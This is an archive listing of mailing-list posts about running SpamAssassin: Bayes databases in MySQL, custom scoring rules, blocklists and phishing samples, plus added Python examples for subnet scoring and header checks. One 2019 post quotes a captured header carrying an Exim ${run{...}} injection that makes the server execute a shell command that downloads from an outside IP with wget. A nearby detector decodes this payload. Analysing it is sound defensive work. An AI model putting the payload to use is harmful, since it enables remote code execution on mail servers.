Re: Strange findings debugging bayes results

2023-02-16 Thread Dave Wreski
Hi, Here are also another 50+ headers we've collected over the years that I believe started as a list from AXB 10+ years ago. https://pastebin.com/raw/f6Fwh8HJ dave On 2/16/23 6:02 AM, Henrik K wrote: On Thu, Feb 16, 2023 at 10:18:50AM +0100, hg user wrote: I was investigating a bunch of

Intuit servers sending paypal phishes

2022-05-06 Thread Dave Wreski
Hi, Intuit's servers are being used to send Paypal phishing invoices combined with the "evil numbers" scam. https://pastebin.com/iad07S8N

Received: from o4.e.notification.intuit.com (o4.e.notification.intuit.com [167.89.82.160])
X-Spam-Status: No, score=-15.691 tagged_above=-200 required=5

Re: Why shouldn't I set the score for SPAM_99 and SPAM_999 higher?

2022-05-05 Thread Dave Wreski
That's a great call, thanks. I grepped my mail files and didn't find any SPAM_99 headers in any of them. You should be looking for BAYES_99 and BAYES_999 in your corpus. Thanks, Dave. I use my various mailboxes (sa-learn --ham --mbox /home/thomas.cameron/mail/INBOX/[mailbox file] and

Re: Why shouldn't I set the score for SPAM_99 and SPAM_999 higher?

2022-05-05 Thread Dave Wreski
You should probably check that none of your ham (i.e. non-spam) messages contains SPAM_99 or SPAM_999. It can happen when spammers poison your bayes database, and increased score in that case might lead to legitimate mail being misclassified as a spam. That's a great call, thanks. I grepped

Re: Seeing "check: exceeded time limit in ..." and need to resolve it

2021-11-16 Thread Dave Wreski
For that matter how many know about 'apropos'? And, even if they do, they may not discover 'locate' because 'apropos search' doesn't find either 'updatedb' or 'locate'. You have to enter 'apropos find' to discover that 'locate' exists, and even then you could get side tracked into trying to

Re: More fake order spam

2021-04-27 Thread Dave Wreski
Invalid List-ID. You can then use that with other weirdness in a meta.

header   __LIST_ID_DOMAIN_IN_BRACKETS List-id =~ /<([\w-]+)(\.[\w-]+)+>/
meta     LIST_ID_IMPROPER_FORMAT __HAS_LIST_ID && !__LIST_ID_DOMAIN_IN_BRACKETS
score    LIST_ID_IMPROPER_FORMAT 0.001
describe

Re: More fake order spam

2021-04-27 Thread Dave Wreski
Hi, Investigate adding the SEM_FRESH rules - this domain was created less than five days ago. https://spameatingmonkey.com/services OK, how do I get those rules installed? I've only installed KAM rules using a channel. I don't see anything similar for SEM rules. I see the page you linked to

Re: More fake order spam

2021-04-27 Thread Dave Wreski
-2.5 RCVD_IN_HOSTKARMA_W    RBL: Sender listed in HOSTKARMA-WHITE [185.41.28.7 listed in hostkarma.junkemailfilter.com]

We've reduced this score to -1 locally.

-1.0 BAYES_00   BODY: Bayes spam probability is 0 to 1%

Needs to be trained, obviously.

Re: Spoofed amazon order email

2021-04-16 Thread Dave Wreski
Hi Steve, As Antony just reported, post these spamples to something like pastebin.com then provide a link so we can view the raw email. X-Spam-Checker-Version: SpamAssassin 3.4.2 (2018-09-13) on This is the first issue I see - you're likely missing a lot of additional features of later

Re: ANN: ReturnPath rule renaming

2021-03-26 Thread Dave Wreski
Hi,

  RCVD_IN_RP_CERTIFIED -> RCVD_IN_VALIDITY_CERTIFIED
  RCVD_IN_RP_SAFE -> RCVD_IN_VALIDITY_SAFE
  RCVD_IN_RP_RNBL -> RCVD_IN_VALIDITY_RPBL

Please audit your local config for score overrides and meta rules depending on the old names.

I don't see that the VALIDITY rules exist yet. Will

Re: apache.org is blacklisted

2021-01-27 Thread Dave Wreski
On 1/27/21 7:40 AM, Matus UHLAR - fantomas wrote: On Wed, 27 Jan 2021, Benny Pedersen wrote: http://multirbl.valli.org/lookup/2a01%3A4f9%3Ac010%3A567c%3A%3A1.html I don't know how to handle this :=) On 26.01.21 17:43, John Hardin wrote: Only one lists it:

Re: Emotet today..

2021-01-13 Thread Dave Wreski
Pedro, do you see sigs for it yet? We're seeing a ton of Doc.Dropper.EmotetRed1220-9816007-0. Have you submitted a sample to Steve at Sanesecurity and clamav? Best, Dave On 1/13/21 10:39 AM, Pedro David Marco wrote: Hi all... sorry for the semi off-topic... Today Emotet is being sent in an

Re: Scoring Based on IP Address

2020-12-17 Thread Dave Wreski
Hi, On 12/17/20 6:05 PM, Matt wrote: Is there a way with spamassassin local.conf to add a higher score based on source ip address or subnet? Basically the last IP in "Received:" header. bad_subnet_add_20_points: 192.168.240.0/24 Raising the score if that IP appeared anywhere in headers or
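As an added example (not code from this thread), here is a Python sketch of the check Matt asks for: take the IP that handed the message to our own MTA, look it up in a local subnet policy table, and add the configured points. The sample message, the subnet table, the point values and the function names are all constructed for the example. The part a practitioner should take away is the trust boundary: only the Received: header written by your own MTA is reliable; every deeper Received: line is sender-supplied data and can say anything.

```python
import ipaddress
import re
from email import message_from_string

# Constructed sample message (not from the post). The topmost Received: header was
# added by our own MTA (mx.example.com) and records the relay that connected to us;
# the lower one was written by a remote host and could have been forged.
SAMPLE_MESSAGE = """Received: from mail.example.net (mail.example.net [192.168.240.17])
\tby mx.example.com (Postfix) with ESMTP id ABC123
\tfor <user@example.com>; Thu, 17 Dec 2020 18:05:00 -0500
Received: from localhost (localhost [127.0.0.1])
\tby mail.example.net (Postfix) with ESMTP id DEF456;
\tThu, 17 Dec 2020 18:04:58 -0500
From: sender@example.net
To: user@example.com
Subject: scoring test

hello
"""

# Hypothetical local policy table standing in for the "bad_subnet_add_20_points"
# idea from the post: network -> points added to the spam score.
BAD_SUBNETS = {
    ipaddress.ip_network("192.168.240.0/24"): 20.0,
    ipaddress.ip_network("192.168.0.0/16"): 5.0,
    ipaddress.ip_network("2001:db8::/32"): 10.0,
}

# Postfix/Sendmail style "from host (rdns [ip])"; Postfix writes IPv6 as [IPv6:...].
_BRACKETED_IP = re.compile(r"\[(?:IPv6:)?([0-9A-Fa-f.:]+)\]")


def last_hop_ip(raw_message):
    """Return the IP that handed the message to our MTA, or None if not found.

    Only the first (most recently added) Received: header is consulted: it is the
    one our own MTA wrote, so the connecting IP in it cannot be forged by the
    sender. Anything deeper in the chain is untrusted data.
    """
    msg = message_from_string(raw_message)
    received = msg.get_all("Received") or []
    if not received:
        return None
    match = _BRACKETED_IP.search(received[0])
    if match is None:
        return None
    try:
        return ipaddress.ip_address(match.group(1))
    except ValueError:
        return None


def subnet_score(ip, policy=BAD_SUBNETS):
    """Points for the most specific policy network containing ip (0.0 if none)."""
    if ip is None:
        return 0.0
    matches = [net for net in policy if ip.version == net.version and ip in net]
    if not matches:
        return 0.0
    most_specific = max(matches, key=lambda net: net.prefixlen)
    return policy[most_specific]


def score_message(raw_message, policy=BAD_SUBNETS):
    """Extra score for a raw message: last-hop IP looked up in the policy table."""
    return subnet_score(last_hop_ip(raw_message), policy)


if __name__ == "__main__":
    print(f"last hop: {last_hop_ip(SAMPLE_MESSAGE)}  extra score: {score_message(SAMPLE_MESSAGE)}")
```

SpamAssassin itself exposes the same relay data through the X-Spam-Relays-Untrusted pseudo-header once trusted_networks and internal_networks are set correctly, so a header rule on that pseudo-header is the native way to score a connecting IP; the script above only makes the trust boundary explicit.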

Re: adding AV scanning to working Postfix/SA system

2020-11-30 Thread Dave Wreski
On 11/30/20 7:00 PM, Joe Acquisto-j4 wrote: On 11/24/20 12:40 PM, Axb wrote: Fuglu supports Sophos AV See fuglu.org Sophos recently discontinued their support for SAVI on Linux. They now only support "Server Central Intercept X Advanced" which is an entirely different product. I would

Re: adding AV scanning to working Postfix/SA system

2020-11-24 Thread Dave Wreski
On 11/24/20 12:40 PM, Axb wrote: Fuglu supports Sophos AV See fuglu.org Sophos recently discontinued their support for SAVI on Linux. They now only support "Server Central Intercept X Advanced" which is an entirely different product. I would also be interested in newer/supported AV

Re: to: header is not in my domain

2020-10-20 Thread Dave Wreski
Thanks for quick reply, but blacklist what? The problem is I do not know this spammy domains. I want to give a score when To: field is NOT in anyaddr...@mydomain.com If only it were that easy. You'll notice that recipients of this mailing list receive mail to the mailing list address, not to

Re: IMPORTANT NOTICE FOR PEOPLE RUNNING TRUNK re: [Bug 7826] Improve language around whitelist/blacklist and master/slave

2020-07-10 Thread Dave Wreski
On 7/10/20 8:07 AM, Pedro David Marco wrote: >On Friday, July 10, 2020, 10:10:20 AM GMT+2, Axb wrote: >so glad to read this... confirms my picture of you. >now back my pet project: rewrite Tom Sawyer OK... who starts??? :-) once Finished we can rewrite "El Quixote" as well...

Coronavirus domains

2020-03-17 Thread Dave Wreski
Hi all, Malwarepatrol has just released a list of 13,000+ domains related to coronavirus scams: https://www.malwarepatrol.net/wp-content/uploads/2020/03/covid-19-domains.txt https://www.malwarepatrol.net/wp-content/uploads/2020/03/covid-19-domains.zip Anyone else have any rules or changes

SpamAssassin 18th anniversary article

2019-10-24 Thread Dave Wreski
Hi all, LinuxSecurity just posted an article on the history of SpamAssassin and its recent 18th anniversary, some of the new features coming in v4, and speaks with some of the lead developers.

Shell commands in Received and Delivered-To headers

2019-07-11 Thread Dave Wreski
Hi all, Anyone have a guess on what this is trying to accomplish?

From r...@sab.com Thu Jul 11 11:05:10 2019
Return-Path:
X-Original-To: root+${run{x2Fbinx2Fsht-ctx22wgetx20199.204.214.40x2fsbzx2f93.184.216.34x22}}@host.example.com
Delivered-To: usern...@example.com
Received: by
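${run{...}} is the syntax of an Exim string-expansion item that executes a command, so a recipient local part carrying it is an attempt to get an MTA that expands the recipient string to run the hex-escaped command inside. As an added example (not part of the original post), the Python below scans the headers a delivery agent might expand, extracts every ${run{...}} item and decodes the escapes so the command can be read. The message is constructed around the header quoted above (the other headers and the body are made up); the backslashes of the \x2F escapes appear to have been stripped by the archive, so the decoder accepts them with or without the backslash, and the decoded sample therefore reads "sht-ct" where the original very likely had "sh\t-c\t" (that reading is my assumption). The header list and function names are the example's own.

```python
import re
from email import message_from_string

# Constructed sample message built around the header quoted in the post.
SAMPLE_MESSAGE = """Return-Path: <>
X-Original-To: root+${run{x2Fbinx2Fsht-ctx22wgetx20199.204.214.40x2fsbzx2f93.184.216.34x22}}@host.example.com
Delivered-To: user@example.com
Received: from localhost (localhost [127.0.0.1])
\tby host.example.com (Postfix) with ESMTP id 0123456789
\tfor <user@example.com>; Thu, 11 Jul 2019 11:05:10 -0400
Subject: test

body
"""

# ${run{...}} is Exim's string-expansion "run" item: wherever an MTA expands the
# recipient or header string, this asks it to execute the inner command.
_RUN_ITEM = re.compile(r"\$\{run\{(.*?)\}\}", re.DOTALL)
# \x2F-style escapes; the backslash is optional because the archived copy lost it.
_HEX_ESCAPE = re.compile(r"\\?x([0-9A-Fa-f]{2})")

# Headers an MTA or delivery agent may feed through expansion (example's own list).
HEADERS_TO_CHECK = ("Received", "Delivered-To", "X-Original-To", "To", "From", "Return-Path")


def decode_payload(payload):
    """Turn the escaped command text back into readable form."""
    text = payload.replace("\\t", "\t")  # literal backslash-t -> tab
    return _HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)


def find_run_items(raw_message, headers=HEADERS_TO_CHECK):
    """Return (header name, decoded command) for every ${run{...}} item found."""
    msg = message_from_string(raw_message)
    hits = []
    for name in headers:
        for value in msg.get_all(name) or []:
            for m in _RUN_ITEM.finditer(value):
                hits.append((name, decode_payload(m.group(1))))
    return hits


def is_suspicious(raw_message):
    """True when any checked header carries an expansion item."""
    return bool(find_run_items(raw_message))


if __name__ == "__main__":
    for header, command in find_run_items(SAMPLE_MESSAGE):
        print(f"{header}: {command}")
```

The same detection as a SpamAssassin rule is a header rule over the ALL pseudo-header, for example header LOCAL_EXIM_RUN_ITEM ALL =~ /\$\{run\{/ (the rule name is a local choice), scored high enough to quarantine: no legitimate address carries an expansion item.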

Re: mysql 8 database problem

2018-12-08 Thread Dave Wreski
On 12/8/18 1:58 PM, Csaba Banhalmi wrote: Hi, I upgraded to mysql and since then I can't use bayes db to score my mails. spamassassin -D says the following:

[12254] dbg: bayes: tok_get_all: SQL error: Illegal mix of collations for operation ' IN '
[12254] dbg: bayes: cannot use bayes on

Re: stackexchange.com in URIBL (false positive?)

2018-07-28 Thread Dave Wreski
  5.7 URIBL_BLACK    Contains an URL listed in the URIBL blacklist [URIs: stackexchange.com]

I guess that's not supposed to be like that. I can't change anything at it, just for information for somebody in the position to fix that.

It is indeed

Re: Just to lighten your day?

2018-05-03 Thread Dave Wreski
Hi, On 05/02/2018 02:21 PM, Joe Acquisto-j4 wrote: One slipped through, with this subtle sig line (thought it might brighten someones day . . . ) "Note: Failure to Verify will lead to final termination of your email account. Technical Team Email Administrator All Right Reversed 2018.(c)"

Re: sneaky spams w/zipped URL file, easily caught by "Thread-Index"

2018-03-27 Thread Dave Wreski
Hi, Excellent... except for one potential problem... this is in their "foxhole_all.cdb" file which they label as "high false positive risk" - which could scare some away! For those who don't score very high on ClamAv and/or who are able to score DIFFERENTLY based on different types of

***UNCHECKED*** Can't locate object method "trim_domain"

2018-01-26 Thread Dave Wreski
Hi, while learning an mbox on a recent 3.4.2 svn:

# sa-learn --spam --progress --mbox junk-012618
28% [==  ] 5.53 msgs/sec 00m44s LEFT
Use of uninitialized value in lc at

Re: SA-Update not updating DB

2017-11-17 Thread Dave Wreski
On 11/17/2017 11:39 AM, Jari Fredriksson wrote: David Jones kirjoitti 16.11.2017 kello 15.22:

REV=1815298
wget http://sa-update.ena.com/${REV}.tar.gz
wget http://sa-update.ena.com/${REV}.tar.gz.sha1
wget http://sa-update.ena.com/${REV}.tar.gz.asc
sa-update -v --install

Re: SA-Update not updating DB

2017-11-16 Thread Dave Wreski
REV=1815298
wget http://sa-update.ena.com/${REV}.tar.gz
wget http://sa-update.ena.com/${REV}.tar.gz.sha1
wget http://sa-update.ena.com/${REV}.tar.gz.asc
sa-update -v --install ${REV}.tar.gz
(reload/restart whatever is calling SA -- spamd, amavis-new, mimedefang, MailScanner, etc.)

I have

Re: Problem with massive log files

2017-04-04 Thread Dave Wreski
Hi, I've posted the spamfilter.sh file to http://pasted.co/7b794ccd I don't see anything in there about verbose logging, but there are two lines in there with a resemblance to your suggestion: logger -f $SALOG -p mail.notice -t spamfilter <<<"Spam filter piping to SpamAssassin:

Re: Problem with massive log files

2017-04-04 Thread Dave Wreski
og file is up to 165 Gb. You should look at your logging and/or log rotating system to get this under control. I believe that's going to be /etc/logrotate.d/ Regards, Dave Kind regards. Jim. On 04/04/17 22:41, Dave Wreski wrote: Hi, My set up consists of Pos

Re: Problem with massive log files

2017-04-04 Thread Dave Wreski
Hi, My setup consists of Postfix, Postgrey, Spamassassin, Clam-AV, Amavis-new and Dovecot.

What is "spamfilter"?

Apr 2 10:31:26 oss2 spamfilter: Sun Oct 16 07:24:13 2016 [16208] info: spamd: connection from ip6-localhost [::1]:53930 to port 783, fd 5

What operating system? Regards,

Re: Define new variables in local.cf

2016-11-08 Thread Dave Wreski
Hi, having the regex in a variable would help maintenance. Something like:

$BankList = "Bank1|Bank2|Bank3|Bank4"
uri BANKURI /$BankList/i
score BANKURI 0.2
body BANKBODY /$BankList/i
score BANKBODY 0.1

is there any way to do this? You might try something like

Re: ClamAV.pm Plugin Not Working

2015-11-20 Thread Dave Wreski
clamdscan -c /etc/clamd.d/scan.conf eicar.txt
/home/dan/eicar.txt: lstat() failed: Permission denied. ERROR

It looks to be related to clamdscan performing a chroot() and the files you're referencing not being available from within that chroot. Try passing the --stream option. -bash-4.3$

Re: SPF and blocking phishing attempts

2015-10-14 Thread Dave Wreski
Hi, On 10/14/2015 06:08 PM, Dianne Skoll wrote: On Wed, 14 Oct 2015 17:51:23 -0400 Alex wrote: I'd like to make sure incoming mail that appears to be "From:" one of our internal users has indeed gone through one of the systems specified in the SPF record, resulting in

Re: Rules needed...

2015-06-27 Thread Dave Wreski
Hi, blacklist_from *@*.allisonarctictrips.com spf-pass take responselily Yes, after it's received, there are a ton of things that could be done to block it (including my local RBL). I was hoping for something preventative. Eh? I'm afraid I don't get this at all - greylisting and RBL

Re: Rules needed...

2015-06-26 Thread Dave Wreski
On 06/26/2015 12:45 PM, Benny Pedersen wrote: Alex Regan skrev den 2015-06-26 18:33: http://pastebin.com/FzUkEvRp blacklist_from *@*.allisonarctictrips.com spf-pass take responselily Yes, after it's received, there are a ton of things that could be done to block it (including my local

Re: PerMsgStatus Util warnings

2015-05-15 Thread Dave Wreski
Hi, $self->{main}->{registryboundaries}->uri_to_domain($fubar); This appears to fix DecodeShortURLs.pm

--- DecodeShortURLs.pm.orig 2015-05-15 11:51:44.688835663 -0400
+++ DecodeShortURLs.pm 2015-05-15 11:39:35.020499066 -0400
@@ -486,7 +486,8 @@

Re: Spamassassin not catching spam (Follow-up)

2015-03-25 Thread Dave Wreski
Hi, RH i don't know the UK laws but in Germany it's for sure not allowed RH because it's legally classified identical to a postman says meh i don't RH walk to go upstairs today and throw the letter away RH if you pretend to provide reliable mailservices it should be logically RH that discard

Re: URLs with non-ASCII chars

2015-02-13 Thread Dave Wreski
On 02/13/2015 05:29 PM, Dave Pooser wrote: On 2/13/15, 4:27 PM, Dave Wreski dwre...@guardiandigital.com wrote: I thought I would send this on to you instead of broadcasting it. You thought wrong :-) Yeah, thanks One too many emails after reading spam for the last twelve hours dave

URLs with non-ASCII chars

2015-02-13 Thread Dave Wreski
Hi John, I thought I would send this on to you instead of broadcasting it. I just received an email with an odd URL. It contained what appears to be a non-ASCII character simulating a period, or at least one that is not part of the standard set. http://pastebin.com/x6TGNpD7 a

Re: spamassassin 3.4.0 spec file for rhel4 rhel5 rhel6 and compatible os's

2014-02-14 Thread Dave Wreski
2>&1 || :
/bin/systemctl try-restart spamassassin.service >/dev/null 2>&1 || :
%endif
%changelog
* Wed Feb 12 2014 Dave Wreski dwre...@guardiandigital.com - 3.4.0-20
- Update to production release
- Build for fedora-17
* Wed Jan 08 2014 Dave Wreski dwre...@guardiandigital.com - 3.4.0-19
- Update SVN

Re: SOLVED Re: malware.blocklist.cf : www.malware.com.br unavailable

2011-08-09 Thread Dave Wreski
Hi, I noticed that the site that provided the malware.blocklist.cf has been unavailable since at least the 8th of August. URL for the file was on http://www.malware.com.br/cgi/submit?action=list_sa The FQDN no longer resolves to an address. I have tried our local DNS, Level3 4.2.2.2

Re: SOLVED Re: malware.blocklist.cf : www.malware.com.br unavailable

2011-08-09 Thread Dave Wreski
Hi, Finally found that they changed their name a few months ago, and finally they turned off the .com.br site. http://www.malwarepatrol.net/ wget http://www.malwarepatrol.net//cgi/submit?action=list_sa; Aren't these the same rules that are already present in the sanesecurity clamav db?

Re: Lots of Chinese Spam with attachments

2011-08-05 Thread Dave Wreski
Here are the typical hits I get on a message:

X-Spam-Status: No, score=3.4 required=5.0 tests=BODY_8BITS,HTML_MESSAGE, MIME_HTML_ONLY,RCVD_IN_BRBL_LASTEXT,RP_MATCHES_RCVD,SPF_PASS autolearn=no version=3.3.1
...
X-Spam-Status: No, score=4.6 required=5.0

Re: Migrating bayes to mysql fails with parsing errors

2011-06-23 Thread Dave Wreski
Hi, since so many have problems i share my mysql schemas :=) `token` binary(5) NOT NULL, Yes, the binary or varbinary is the key to a solution here. Mucking with utf-8 vs latin-1 is just covering but not solving the most glaring problem here, namely that a token must not be associated with

Re: Migrating bayes to mysql fails with parsing errors

2011-06-23 Thread Dave Wreski
Hi,

ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_bin;

It's now working, but is excruciatingly slow. Is this also just covering the problem, or will this be a usable solution when it finally finishes? Just being curious: are you using bayes_store_module

Re: Migrating bayes to mysql fails with parsing errors

2011-06-23 Thread Dave Wreski
Hi,

dbg: bayes: error inserting token for line: t 1 0 1308114254 4fd2b3f2f0
dbg: bayes: _put_token: Updated an unexpected number of rows.

I have opened three bug entries, the first one is directly in response to this problem report and brings a fix: [Bug 6624] BayesStore/MySQL.pm fails to

Re: Migrating bayes to mysql fails with parsing errors

2011-06-21 Thread Dave Wreski
Hi,

dbg: bayes: error inserting token for line: t 1 0 1308114254 4fd2b3f2f0
dbg: bayes: _put_token: Updated an unexpected number of rows.
[repeats ...]

Which version of MySQL? Did you remember to replace TYPE=MyISAM with TYPE=InnoDB in the schema (according to README.bayes) if you are

Re: Migrating bayes to mysql fails with parsing errors

2011-06-21 Thread Dave Wreski
Hi, It looks like that may be my problem too. This is the result with your patch:

dbg: bayes: database connection established
dbg: bayes: found bayes db version 3
dbg: bayes: Using userid: 2
dbg: bayes: database connection established
dbg: bayes: found bayes db version 3
dbg: bayes: using

Re: Migrating bayes to mysql fails with parsing errors

2011-06-21 Thread Dave Wreski
Hi, since so many have problems i share my mysql schemas :=) please note that i expire some data not default done in current spamassassin Your schema did not work for me. I deleted the existing database and recreated it, then created the tables using your schema. When starting to restore, a

Migrating bayes to mysql fails with parsing errors

2011-06-20 Thread Dave Wreski
Hi, I have an existing v3.3.2 on fedora14 (perl v5.12.3) that I'm trying to convert bayes to use mysql. The restore process fails after a few minutes due to too many errors:

dbg: bayes: error inserting token for line: t 1 0 1308114254 4fd2b3f2f0
dbg: bayes: _put_token: Updated an unexpected

Re: Migrating bayes to mysql fails with parsing errors

2011-06-20 Thread Dave Wreski
Hi, This one is the current SQL schema and works http://svn.apache.org/repos/asf/spamassassin/tags/spamassassin_current_release_3.3.x/sql/bayes_mysql.sql - Lawrence On 20/06/2011 7:34 PM, Dave Wreski wrote: Hi, I have an existing v3.3.2 on fedora14 (perl v5.12.3) that I'm trying

Re: Migrating bayes to mysql fails with parsing errors

2011-06-20 Thread Dave Wreski
Hi, I have an existing v3.3.2 on fedora14 (perl v5.12.3) that I'm trying to convert bayes to use mysql. The restore process fails after a few minutes due to too many errors:

dbg: bayes: error inserting token for line: t 1 0 1308114254 4fd2b3f2f0
dbg: bayes: _put_token: Updated an unexpected

Re: Nearly 200.000 Spams today from coolserver.info and starsweet.info

2011-06-16 Thread Dave Wreski
Hi, for some days my servers have been hit by 50.000-80.000 Spams a day and for some minutes they have spammed today 18 accounts out of 98.000 with MORE than 100.000 spams. All spams coming from the same network: xxx.root.static.coolserver.info xxx.root.static.starsweet.info where xxx

Re: MySQL bayes setup question

2011-06-14 Thread Dave Wreski
Marc, You can also find the readme for sql support there, or check out: http://svn.apache.org/repos/asf/spamassassin/branches/3.3/sql/README.bayes It's quite easy to setup and get running. I can't seem to find the bayes_mysql.sql file anywhere. Depending on your distribution it could be in